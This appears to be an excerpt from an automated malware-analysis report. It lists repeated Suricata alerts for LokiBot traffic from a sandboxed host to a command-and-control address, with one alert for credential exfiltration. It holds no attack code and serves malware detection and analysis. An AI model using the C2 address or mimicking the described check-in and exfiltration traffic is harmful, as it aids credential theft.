                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49800 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49743
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49736 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49754 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49737 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49800 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49800 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49773 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49755 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49751
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49755 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49774 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49774 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49774 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49795 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49723 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49795 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49715 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49739 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49754 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49732 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49721
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49781 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49754 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49804 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49732 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49732 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49800
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49792 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49723 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49737 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49774 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49723 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49755 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49755 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49732
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49737 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49738 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49739 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49737 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49804 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49739 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49773 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49770 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49729 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.10:49707 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49797 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49736
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49797 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49749 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49722 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49738 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49722 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49738 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49754
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49722 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49715 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49757
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49715 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49804 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49773 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49771 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49771 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49773 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49770 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49773 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49770 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49771 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49805 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49805 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49805 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49729 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49749
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49802 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49729 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49738 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49755
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49722 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49759 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49759 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49729 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49740 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49729 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49728 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49728 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49728 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49772 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49774 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49772 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49781 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49770 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49795
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49770 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49803 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49804 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49804 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49794 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49794 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49794 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49804
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49775 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49775 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49775 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49739
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49770
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49775 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49775 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49781 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49781 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49776 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49776 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49776 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49802 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49802 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49776 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49776 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49802 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49802 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49779 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49779 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49771 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49779 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49798 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49759 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49771 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49798 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49798 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49779 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49779 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49740 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49740 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49729
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49772 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49798 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49740 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49791 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49798 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49794 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49794 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49794
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49798
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49747 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49747 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49747 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49747 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49747 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49747
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49781
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49762 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49762 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49762 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49809 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49809 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49809 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49762 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49762 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49801 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49801 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49801 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49805 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49805 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49762
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49723
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49738 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49737
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49797 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49797 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49769 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49769 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49772 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49772 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49740 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49803 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49792 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49779
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49722
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49809 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49809 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49738
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49769 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49769 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49769 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49802
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49709 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49709 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49709 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49728 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49728 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49745 -> 45.149.241.169:80
